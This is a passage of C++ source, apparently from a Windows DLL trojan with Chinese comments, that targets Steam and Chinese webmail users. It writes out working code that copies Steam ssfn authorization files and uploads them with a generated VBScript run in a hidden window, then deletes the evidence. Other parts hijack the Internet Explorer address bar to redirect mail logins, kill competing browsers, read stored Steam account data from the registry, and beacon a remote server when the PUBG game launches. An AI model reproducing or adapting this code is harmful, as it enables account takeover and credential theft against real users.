		DeleteFile(mySSFNFiles);
	}
 
	return FALSE;
}

 
// 上传 并 删除 授权文件模块

BOOL DllExport SearchFilesByWildcard_2(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{
	HANDLE hFile = INVALID_HANDLE_VALUE;
	WIN32_FIND_DATA pNextInfo;

	CString myLP;
	CString myVBSFilePath;
	CString mySSFNFiles = "", myTXTSSFNFiles = "", mySSFNFilesName = "";

	myLP = szLocalLP;

	CString myUploadVBS = "";
	myUploadVBS += "Class XMLUpload \r\n";
	myUploadVBS += "Private xmlHttp \r\n";
	myUploadVBS += "Private objTemp \r\n";
	myUploadVBS += "Private adTypeBinary, adTypeText \r\n";
	myUploadVBS += "Private strCharset, strBoundary \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Sub Class_Initialize() \r\n";
	myUploadVBS += "adTypeBinary = 1 \r\n";
	myUploadVBS += "adTypeText = 2 \r\n";
	myUploadVBS += "Set xmlHttp = CreateObject(\"Msxml2.XMLHTTP\") \r\n";
	myUploadVBS += "Set objTemp = CreateObject(\"ADODB.Stream\") \r\n";
	myUploadVBS += "objTemp.Type = adTypeBinary \r\n";
	myUploadVBS += "objTemp.Open \r\n";
	myUploadVBS += "strCharset = \"utf-8\" \r\n";
	myUploadVBS += "strBoundary = GetBoundary() \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Sub Class_Terminate() \r\n";
	myUploadVBS += "objTemp.Close \r\n";
	myUploadVBS += "Set objTemp = Nothing \r\n";
	myUploadVBS += "Set xmlHttp = Nothing \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Function StringToBytes(ByVal strData, ByVal strCharset) \r\n";
	myUploadVBS += "Dim objFile \r\n";
	myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";
	myUploadVBS += "objFile.Type = adTypeText \r\n";
	myUploadVBS += "objFile.Charset = strCharset \r\n";
	myUploadVBS += "objFile.Open \r\n";
	myUploadVBS += "objFile.WriteText strData \r\n";
	myUploadVBS += "objFile.Position = 0 \r\n";
	myUploadVBS += "objFile.Type = adTypeBinary \r\n";
	myUploadVBS += "If UCase(strCharset) = \"UNICODE\" Then \r\n";
	myUploadVBS += "objFile.Position = 2 'delete UNICODE BOM \r\n";
	myUploadVBS += "ElseIf UCase(strCharset) = \"UTF-8\" Then \r\n";
	myUploadVBS += "objFile.Position = 3 'delete UTF-8 BOM \r\n";
	myUploadVBS += "End If \r\n";
	myUploadVBS += "StringToBytes = objFile.Read(-1) \r\n";
	myUploadVBS += "objFile.Close \r\n";
	myUploadVBS += "Set objFile = Nothing \r\n";
	myUploadVBS += "End Function \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Function GetFileBinary(ByVal strPath) \r\n";
	myUploadVBS += "Dim objFile \r\n";
	myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";
	myUploadVBS += "objFile.Type = adTypeBinary \r\n";
	myUploadVBS += "objFile.Open \r\n";
	myUploadVBS += "objFile.LoadFromFile strPath \r\n";
	myUploadVBS += "GetFileBinary = objFile.Read(-1) \r\n";
	myUploadVBS += "objFile.Close \r\n";
	myUploadVBS += "Set objFile = Nothing \r\n";
	myUploadVBS += "End Function \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Function GetBoundary() \r\n";
	myUploadVBS += "Dim ret(12) \r\n";
	myUploadVBS += "Dim table \r\n";
	myUploadVBS += "Dim i \r\n";
	myUploadVBS += "table = \"abcdefghijklmnopqrstuvwxzy0123456789\" \r\n";
	myUploadVBS += "Randomize \r\n";
	myUploadVBS += "For i = 0 To UBound(ret) \r\n";
	myUploadVBS += "ret(i) = Mid(table, Int(Rnd() * Len(table) + 1), 1) \r\n";
	myUploadVBS += "Next \r\n";
	myUploadVBS += "GetBoundary = \"---------------------------\" & Join(ret, Empty) \r\n";
	myUploadVBS += "End Function \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Property Let Charset(ByVal strValue) \r\n";
	myUploadVBS += "strCharset = strValue \r\n";
	myUploadVBS += "End Property \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Sub AddForm(ByVal strName, ByVal strValue) \r\n";
	myUploadVBS += "Dim tmp \r\n";
	myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"\\r\\n\\r\\n$3\" \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$3\", strValue) \r\n";
	myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Sub AddFile(ByVal strName, ByVal strFileName, ByVal strFileType, ByVal strFilePath) \r\n";
	myUploadVBS += "Dim tmp \r\n";
	myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"; filename=\"\"$3\"\"\\r\\nContent-Type: $4\\r\\n\\r\\n\" \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$3\", strFileName) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$4\", strFileType) \r\n";
	myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";
	myUploadVBS += "objTemp.Write GetFileBinary(strFilePath) \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Sub AddEnd() \r\n";
	myUploadVBS += "Dim tmp \r\n";
	myUploadVBS += "tmp = \"\\r\\n--$1--\\r\\n\" \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";
	myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";
	myUploadVBS += "objTemp.Position = 2 \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Function Upload(ByVal strURL) \r\n";
	myUploadVBS += "Call AddEnd \r\n";
	myUploadVBS += "xmlHttp.Open \"POST\", strURL, False \r\n";
	myUploadVBS += "xmlHttp.setRequestHeader \"Content-Type\", \"multipart/form-data; boundary=\" & strBoundary \r\n";
	myUploadVBS += "xmlHttp.Send objTemp \r\n";
	myUploadVBS += "Upload = xmlHttp.responseText \r\n";
	myUploadVBS += "End Function \r\n";
	myUploadVBS += "End Class \r\n";
	myUploadVBS += "";
	myUploadVBS += "Dim UploadData \r\n";
	myUploadVBS += "Dim UploadState \r\n";
	myUploadVBS += "Set UploadData = New XMLUpload \r\n";
	myUploadVBS += "UploadData.Charset = \"utf-8\" \r\n";
	myUploadVBS += "UploadData.AddForm \"content\", \"Hello world\" \r\n";
	myUploadVBS += "UploadData.AddFile \"image\", \"%s\", \"text/txt\", \"c:/%s\" \r\n";
	myUploadVBS += "UploadState = UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";
	myUploadVBS += "If UploadState = \"FILES_UPLOAD_OK\" Then \r\n";
	myUploadVBS += "	\r\n";
	myUploadVBS += "Else \r\n";
	myUploadVBS += "	WScript.sleep 10000 \r\n";
	myUploadVBS += "	UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";
	myUploadVBS += "End If \r\n";
	myUploadVBS += "Set UploadData = Nothing \r\n";
	myUploadVBS += "Set objFSO = CreateObject(\"Scripting.FileSystemObject\") \r\n";
	myUploadVBS += "objFSO.DeleteFile(\"c:/%s\") \r\n";
	myUploadVBS += "objFSO.DeleteFile(WScript.ScriptFullName) \r\n";
	myUploadVBS += "Set objFSO = Nothing \r\n";

	hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);
	if(INVALID_HANDLE_VALUE == hFile)
	{
		return FALSE;
	}

	if(pNextInfo.cFileName[0] != '.')
	{
		myVBSFilePath = "";
		myVBSFilePath += szMyselfPath;
		myVBSFilePath += GetName();
		myVBSFilePath += "64.VBS";

		mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);
		mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);
		myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);

		//AfxMessageBox(mySSFNFiles);

		CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);

		Sleep(1000);

		CString szUploadVBS = "";
		szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);

		FILE *fp;
		fp=fopen(myVBSFilePath, "w");
		if(fp)
		{
			fprintf(fp, "%s", szUploadVBS.GetBuffer(0));
		}
		fclose(fp);

		Sleep(1000);

		ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);

		DeleteFile(mySSFNFiles);
	}
 
	while(FindNextFile(hFile, &pNextInfo))
	{
		if(pNextInfo.cFileName[0] == '.')
		{
			continue;
		}

		myVBSFilePath = "";
		myVBSFilePath += szMyselfPath;
		myVBSFilePath += GetName();
		myVBSFilePath += "64.VBS";

		mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);
		mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);
		myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);

		//AfxMessageBox(mySSFNFiles);

		CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);

		Sleep(1000);

		CString szUploadVBS = "";
		szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);

		FILE *fp;
		fp=fopen(myVBSFilePath, "w");
		if(fp)
		{
			fprintf(fp, "%s", szUploadVBS.GetBuffer(0));
		}
		fclose(fp);

		Sleep(1000);

		ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);

		DeleteFile(mySSFNFiles);
	}
 
	return FALSE;
}

 
// 数据发送模块

BOOL DllExport SendURLPost(CString strPostStr)
{
    HMODULE hshell;
    hshell=LoadLibrary(_T("wininet.dll"));

    HINSTANCE (WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
	HINSTANCE (WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
	HINSTANCE (WINAPI *XXXInternetCloseHandle)(HINTERNET);

    (FARPROC&)XXXInternetOpen = GetProcAddress(hshell,"InternetOpenA");
	(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell,"InternetOpenUrlA");
	(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell,"InternetCloseHandle");

    HINTERNET hropen=XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
	if( hropen == NULL )
	{
		FreeLibrary(hshell);

		return FALSE;
	}

	HINTERNET hropenurl = XXXInternetOpenUrl(hropen, strPostStr, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
	if( hropenurl == NULL )
	{
		FreeLibrary(hshell);

		return FALSE;
	}

	XXXInternetCloseHandle(hropen);
	XXXInternetCloseHandle(hropenurl);

    FreeLibrary(hshell);

	return TRUE;
}

 
// 劫持 IE 线程模块

static DWORD WINAPI HOOKBrowser(LPVOID pParam)
{
	//AfxMessageBox("劫持 IE 线程模块启动!");

	do{
		CString szMyClass = "";

		HWND Hwnd_IEFrame = ::GetForegroundWindow();
		TCHAR szClassName[MAX_PATH]={0};
		ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));
		::GetClassName(Hwnd_IEFrame, szClassName, MAX_PATH);

		szMyClass.Format(TEXT("%s"), szClassName);
		szMyClass.Replace(" ", "");

		if(szMyClass == "IEFrame")
		{
			//AfxMessageBox("IEFrame Class");

			HWND Hwnd_1 = ::FindWindowEx(Hwnd_IEFrame, NULL, _T("WorkerW"), NULL);

			if(Hwnd_1 != NULL)
			{
				HWND Hwnd_2 = ::FindWindowEx(Hwnd_1, NULL, _T("ReBarWindow32"), NULL);

				if(Hwnd_2 != NULL)
				{
					HWND Hwnd_3 = ::FindWindowEx(Hwnd_2, NULL, _T("Address Band Root"), NULL);

					if(Hwnd_3 != NULL)
					{
						HWND Hwnd_4 = ::FindWindowEx(Hwnd_3, NULL, _T("ToolbarWindow32"), NULL);
						HWND Hwnd_5 = ::FindWindowEx(Hwnd_3, NULL, _T("Edit"), NULL);

						if(Hwnd_4 != NULL && Hwnd_5 != NULL)
						{
							TCHAR szGetEditStr[MAX_PATH]={0};
							CString szMyEditStr1 = "", szMyEditStr2 = "";
							ZeroMemory(szGetEditStr, MAX_PATH * sizeof(TCHAR));

							::SendMessage(Hwnd_5, WM_GETTEXT, MAX_PATH, (LPARAM)szGetEditStr);

							//AfxMessageBox(szGetEditStr);

							szMyEditStr1.Format(_TEXT("%s"), szGetEditStr);

							szMyEditStr1.Replace("//", "`");

							AfxExtractSubString(szMyEditStr2, szMyEditStr1, 0, '/');

							szMyEditStr2.Replace("`", "//");

							CString szEditReplace;

							if( szMyEditStr2 == "http://mail.qq.com" || szMyEditStr2 == "https://mail.qq.com" )
							{
								// 清理缓存
								//DelTempFiles();

								szMailAddr = "";
								szMailAddr = szMyEditStr2;

								szEditReplace = TEXT("https://ui.ptlogin2.qq.com/cgi-bin/login?style=9&appid=522005705&daid=4&s_url=https%3A%2F%2Fw.mail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwsk%26delegate_url%3D%26f%3Dxhtml%26target%3D&hln_css=http%3A%2F%2Fmail.qq.com%2Fzh_CN%2Fhtmledition%2Fimages%2Flogo%2Fqqmail%2Fqqmail_logo_default_200h.png&low_login=1&hln_autologin=%E8%AE%B0%E4%BD%8F%E7%99%BB%E5%BD%95%E7%8A%B6%E6%80%81&pt_no_onekey=1");

								char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);
								szEditReplace.ReleaseBuffer();

								::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);

								::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );

								szBrowser = true;
							}
							else if( szMyEditStr2 == "https://mail.163.com" || szMyEditStr2 == "https://mail.126.com"  || szMyEditStr2 == "https://mail.yeah.net" )
							{
								// 清理缓存
								//DelTempFiles();

								szMailAddr = "";
								szMailAddr = szMyEditStr2;

								szEditReplace.Format(TEXT("https://email.163.com/"));

								char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);
								szEditReplace.ReleaseBuffer();

								::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);

								::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );

								szBrowser = true;
							}
							else if( szMyEditStr2 == "https://www.188.com" || szMyEditStr2 == "https://188.com" )
							{
								// 清理缓存
								//DelTempFiles();

								szMailAddr = "";
								szMailAddr = szMyEditStr2;

								szEditReplace.Format(TEXT("https://vip.188.com/webapp/login188.html"));

								char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);
								szEditReplace.ReleaseBuffer();

								::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);

								::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );

								szBrowser = true;
							}
							else
							{
								szMailAddr = "";
								szMailAddr = szMyEditStr2;
							}
						}
					}
				}
			}
		}
		Sleep(100);

	} while( !szBrowser );

	return 0;
}

 
// 锁定注册表默认浏览器 并 劫持非IE内核浏览器 线程模块

static DWORD WINAPI HOOKIERegedit(LPVOID pParam)
{
	//AfxMessageBox("线程模块启动!");

	do{
		if( GetProcess("360se.exe") && GetProcess("steam.exe") )
		{
			CString myIEver = GetIEVerSion();
			int szIE_8 = myIEver.Find("8.0", 0);

			if( szIE_8 >= 0)
			{
				goto myOtherFunction;
			}
			else
			{
				if( KillProcess("360se.exe") )
				{
					if( GetProcess("QQ.exe") )
					{
						ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);
					}
					else
					{
						ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);
					}
				}
				szIERegedit = true;
			}
		}
		else if( GetProcess("360chrome.exe") && GetProcess("steam.exe") )
		{
			CString myIEver = GetIEVerSion();
			int szIE_8 = myIEver.Find("8.0", 0);

			if( szIE_8 >= 0)
			{
				goto myOtherFunction;
			}
			else
			{
				if( KillProcess("360chrome.exe") )
				{
					if( GetProcess("QQ.exe") )
					{
						ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);
					}
					else
					{
						ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);
					}
				}
				szIERegedit = true;
			}
		}
		else
		{
			goto myOtherFunction;
		}

	myOtherFunction:
		if( GetProcess("steam.exe") )
		{
			HWND Hwnd_Browser = ::GetForegroundWindow();

			TCHAR szClassName[MAX_PATH];
			ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));
			::GetClassName(Hwnd_Browser, szClassName, MAX_PATH);

			CString szMyClass = "";
			szMyClass.Format(TEXT("%s"), szClassName);

			int sz360Class = szMyClass.Find("360se6_Frame", 0);
			int szChromeClass = szMyClass.Find("WidgetWin_1", 0);
			int szChromeClass_WidgetWin = szMyClass.Find("Chrome_WidgetWin_1", 0);
			int szQQBrowserClass_WidgetWin = szMyClass.Find("QQBrowser_WidgetWin_0", 0);

			if( sz360Class >= 0 || szChromeClass_WidgetWin >= 0 || szChromeClass >= 0 || szQQBrowserClass_WidgetWin >= 0 )
			{
				DWORD processid;
				::GetWindowThreadProcessId(Hwnd_Browser, &processid);

				HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, processid);
				if(hprocess != NULL)
				{
					CString myIEver = GetIEVerSion();
					int szIE_8 = myIEver.Find("8.0", 0);

					if( szIE_8 >= 0)
					{
						DWORD cbNeededx = 0;
						HMODULE hModx = NULL;

						if( ::EnumProcessModules( hprocess, &hModx, sizeof( hModx ), &cbNeededx ) !=0 )
						{
							TCHAR myBrowserPath[MAX_PATH + 1] = {0};
							if( ::GetModuleFileNameEx( hprocess, hModx, myBrowserPath, MAX_PATH ) !=0 )
							{
								CString szBrowserPath;
								szBrowserPath.Format(TEXT(" /c \"%s\" https://w.mail.qq.com"), myBrowserPath);

								//AfxMessageBox("szBrowserPath:\n"+szBrowserPath);

								::TerminateProcess(hprocess, 0);

								ShellExecute(NULL, "open", "cmd.exe", szBrowserPath, "", SW_HIDE);
							}
						}
					}
					else
					{
						::TerminateProcess(hprocess, 0);

						if( GetProcess("QQ.exe") )
						{
							ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);
						}
						else
						{
							ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);
						}
					}
					szIERegedit = true;
				}
				::CloseHandle(hprocess);
			}
		}
		Sleep(100);

	} while( !szIERegedit );

	return 0;
}

 
// 监控 Tslgame 主界面 线程模块

static DWORD WINAPI HOOKGameMain(LPVOID pParam)
{
	//AfxMessageBox("监控 Tslgame 主界面 线程 已启动!");

	szTslgameEXE = FALSE;

	do{
		HWND Hwnd_Tslgame = ::GetForegroundWindow();

		TCHAR szSTClassName[MAX_PATH]={0};

		ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));

		::GetClassName(Hwnd_Tslgame, szSTClassName, MAX_PATH);

		CString szMySTClass = "";
		szMySTClass.Format(TEXT("%s"), szSTClassName);

		int isSTClass = szMySTClass.Find("UnrealWindow", 0);

		if( GetProcess("TslGame.exe") && isSTClass >= 0 )
		{
			//AfxMessageBox("窗口样式:" + szStyle1 + "\n扩展样式:" + szStyle2);

			//AfxMessageBox("已登录 Tslgame 主界面!");

			// 构建统计数据
			CString strPostData = "";
			strPostData.Format(TEXT("%scj.php?ID=%s&CJ=0"), 
			strMailServerName, 
			szMailID);

			//AfxMessageBox(strPostData);

			DWORD dw0;
			BOOL isConnect = ::IsNetworkAlive( &dw0 );
			if( isConnect )
			{
				BOOL Result = SendURLPost(strPostData);
				if( Result )
				{
					szTslgameEXE = true;
				}
			}
		}
		else
		{
			if( !GetProcess("steam.exe") )
			{
				szTslgameEXE = true;
			}
		}
		Sleep(100);

	} while( !szTslgameEXE );

	return 0;
}
 
// 监控 Steam 主界面 线程模块

static DWORD WINAPI HOOKLoginMain(LPVOID pParam)
{
	//AfxMessageBox("监控 steam.exe 主界面 线程 已启动!");

	BOOL szLoginEXE = FALSE;

	do{
		if( ::GetCurrentProcessId() == GetEXE() )
		{
			HWND Hwnd_Steam = ::GetForegroundWindow();

			TCHAR szSTClassName[MAX_PATH]={0};
			ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));
			::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);

			CString szMySTClass = "";
			szMySTClass.Format(TEXT("%s"), szSTClassName);

			int isSTClass1 = szMySTClass.Find("PopupWindow", 0);
			int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);

			long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);
			long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);

			long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);
			long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);

			CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";

			szStyle1.Format(TEXT("%X"), lstyle1);
			szStyle2.Format(TEXT("%X"), lstyle2);

			szStyle3.Format(TEXT("%X"), lstyle3);
			szStyle4.Format(TEXT("%X"), lstyle4);

			if( 
				(isSTClass2 >= 0 || isSTClass1 >= 0) 
				&& 
				(szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") 
			)
			{
				//AfxMessageBox("窗口样式:" + szStyle1 + "\n扩展样式:" + szStyle2);

				//AfxMessageBox("开始判断是否已登录Steam主界面!");

				///
				// 处理电脑授权文件

				CString mySTInstPath = "", mySTSSFNFilePath = "";

				HKEY dw_hKey;
				LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,
				TEXT("Software\\Valve\\Steam"),
				0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );
				if( x_Ret1 == ERROR_SUCCESS )
				{
					char dw_data[256] = {0};
					DWORD dw_Type = REG_SZ;
					DWORD dw_Length = 256;

					LONG x_Ret2 = RegQueryValueEx( dw_hKey, 
					TEXT("SteamPath"), 
					NULL, 
					&dw_Type, (LPBYTE)dw_data, &dw_Length );

					mySTInstPath.Format(TEXT("%s"), dw_data);
					mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);
				}
				RegCloseKey(dw_hKey);

				char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);
				mySTInstPath.ReleaseBuffer();

				char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);
				mySTSSFNFilePath.ReleaseBuffer();

				//AfxMessageBox(mySTInstPath);
				//AfxMessageBox(mySTSSFNFilePath);

				SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);

				szTslgameEXE = true;

				Sleep(3000);

				DWORD dwThreadId4;
				CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); 

				szBrowser = true;
				szLoginEXE = true;
				szEMailName = false;
				szIERegedit = true;
			}
		}
		else
		{
			if( !GetProcess("steam.exe") )
			{
				szBrowser = true;

				szLoginEXE = true;

				szEMailName = false;

				szIERegedit = true;
			}
		}
		Sleep(100);

	} while( !szLoginEXE );

	return 0;
}

 
// 监控 登陆器界面 线程模块

static DWORD WINAPI HOOKLoginEXE(LPVOID pParam)
{
	//AfxMessageBox("监控 steam.exe 登陆器 线程 已启动!");

	BOOL szLoginEXE = FALSE;

	do{
		if(::GetCurrentProcessId() == GetEXE())
		{
			HWND H_wnd = ::GetForegroundWindow();

			char sTitles[256];
			memset(sTitles, 0, 256);

			::SendMessage(H_wnd, WM_GETTEXT, 255, (LPARAM)sTitles);

			char *LP1;
			LP1 = strstr(sTitles, "Steam 令牌");

			char *LP2;
			LP2 = strstr(sTitles, "Steam  令牌");

			char *LP3;
			LP3 = strstr(sTitles, "Steam Guard");

			char *LP4;
			LP4 = strstr(sTitles, "Steam  Guard");

			char *LP5;
			LP5 = strstr(sTitles, "S t e a m 令牌");

			char *LP6;
			LP6 = strstr(sTitles, "S t e a m  令牌");

			char *LP7;
			LP7 = strstr(sTitles, "令牌");

			if( LP1 || LP2 || LP3 || LP4 || LP5 || LP6 || LP7 )
			{
				//AfxMessageBox("开始判断令牌种类!");

				long lstyle1 = GetWindowLong(H_wnd, GWL_STYLE);
				long lstyle2 = GetWindowLong(H_wnd, GWL_EXSTYLE);

				long lstyle3 = GetWindowLongPtr(H_wnd, GWL_STYLE);
				long lstyle4 = GetWindowLongPtr(H_wnd, GWL_EXSTYLE);

				CString szLP1 = "", szLP2 = "", szLP3 = "", szLP4 = "";

				szLP1.Format(TEXT("%X"), lstyle1);
				szLP2.Format(TEXT("%X"), lstyle2);

				szLP3.Format(TEXT("%X"), lstyle3);
				szLP4.Format(TEXT("%X"), lstyle4);

				//AfxMessageBox("窗口样式:"+szLP1+"\n扩展样式:"+szLP2);

				if( szLP1 == "960A0000" || szLP1 == "96CA0000" || szLP3 == "960A0000" || szLP3 == "96CA0000" )
				{
					//AfxMessageBox("邮箱令牌");
					szLocalLP = "0";
				}
				else if( szLP1 == "960F0000" || szLP1 == "96CF0000" || szLP3 == "960F0000" || szLP3 == "96CF0000" )
				{
					//AfxMessageBox("手机令牌");
					szLocalLP = "1";
				}
				else
				{
					//AfxMessageBox("未知令牌");
					szLocalLP = "2";
				}

				HKEY hKey, xKey;
				LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,
				TEXT("Software\\Valve\\Steam"),
				0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );
				if( lRet == ERROR_SUCCESS )
				{
					char user[256] = {0};
					DWORD dwType = REG_SZ;
					DWORD dwLength = 256;

					LONG lRet2 = RegQueryValueEx( hKey, 
					TEXT("AutoLoginUser"), 
					NULL, 
					&dwType, (LPBYTE)user, &dwLength );
					if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 )
					{
						CString LocalUser = "";
						CString ReadRegUser = "";

						LocalUser.Format(TEXT("%s"), user);
						ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);

						LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,
						ReadRegUser,
						0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );
						if( lRet2 == ERROR_SUCCESS )
						{
							char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};
							DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;
							DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;

							LONG lRet3 = RegQueryValueEx( xKey, 
							TEXT("AccOne"), 
							NULL, 
							&dwType1, (LPBYTE)data1, &dwLength1 );

							LONG lRet4 = RegQueryValueEx( xKey, 
							TEXT("DataOne"), 
							NULL, 
							&dwType2, (LPBYTE)data2, &dwLength2 );

							LONG lRet5 = RegQueryValueEx( xKey, 
							TEXT("AccSecond"), 
							NULL, 
							&dwType3, (LPBYTE)data3, &dwLength3 );

							LONG lRet6 = RegQueryValueEx( xKey, 
							TEXT("DataSecond"), 
							NULL, 
							&dwType4, (LPBYTE)data4, &dwLength4 );

							if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) )
							{
								CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";

								szRegAccOne.Format(TEXT("%s"), data1);
								szRegDataOne.Format(TEXT("%s"), data2);
								szRegAccSecon.Format(TEXT("%s"), data3);
								szRegDataSecon.Format(TEXT("%s"), data4);

								/
								// 随机生成 16位 KEY

								time_t seed = time(NULL); 
								srand((unsigned)seed);

								int randNum = (rand()*2);

